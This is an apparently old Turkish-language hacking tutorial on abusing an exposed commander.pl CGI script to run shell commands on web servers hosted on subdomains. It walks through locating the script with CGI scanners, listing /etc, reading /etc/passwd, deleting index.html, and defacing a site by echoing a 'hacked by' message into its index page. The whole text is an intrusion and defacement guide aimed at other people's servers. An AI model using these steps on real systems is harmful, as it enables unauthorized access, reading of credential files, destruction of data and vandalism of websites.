Web Hack Herhangi Bir Subdomaine Linklenen Veya Tamamen Subdomain Uzerine Kurulmuş Web Serverlarını Commander.pl Açığı Ile Hackleyebiliriz Ornek Subdomain Serverımız |www.itgo.com Adres http://www.L-manyak.itgo.com Olsun Komutlar Ls: Dosya ve Klasörleri Gösterir: Ls /etc Cat: Dosya Içeriğini Gösterir: Cat /etc/passwd Pwd: Nerde Olduğumuzu Gösterir: Pwd Rm: Dosya Silme Işlemi Için Kullanılır: Rm index.html Mkdir: Yeni Klasör Açmaya Yarar: Mkdir webdagger http://webdagger.virtualave.net/commander.pl Pwd Ile Nerde Olduğumuza Bakıyoruz /www/home/usr/webdagger/ Şimdi Istediğimiz Klasöre Geçip Içeriğine Bakabiliriz
Web Hack Commander.pl Açığı Ile Bir Başka Teknik Daha Var Cgi-Bin Scannerları Kullanarak www.hackedpage.com/cgi-bin/commander.pl Diye Arayabiliriz Bulma Şansımız Çok Yüksek Bulduğumuzu Farz Edelim www.hackedpage.com/cgi-bin/commander.pl Diye Giriyoruz Nerde Olduğumuzu Oğrenmek Için www.hackedpage.com/cgi-bin/commander.pl Pwd Yazıp Nerde Olduğumuza Bakıyoruz /home/www/usr/hackedpage/cgi-bin/ Çıkıyor Karşımıza Bu Sayfanın index ine astalawista baby hacked by hurgruhg Yazmak Istiyoruz Mesela Echo Komutu Bizim Ihtiyacımızı Görür echo astalawista baby hacked by hurgruhg /home/www/usr/hackedpage/index.html Yazıyoruz index.html De astalawista baby hacked by hurgruhg yazıyor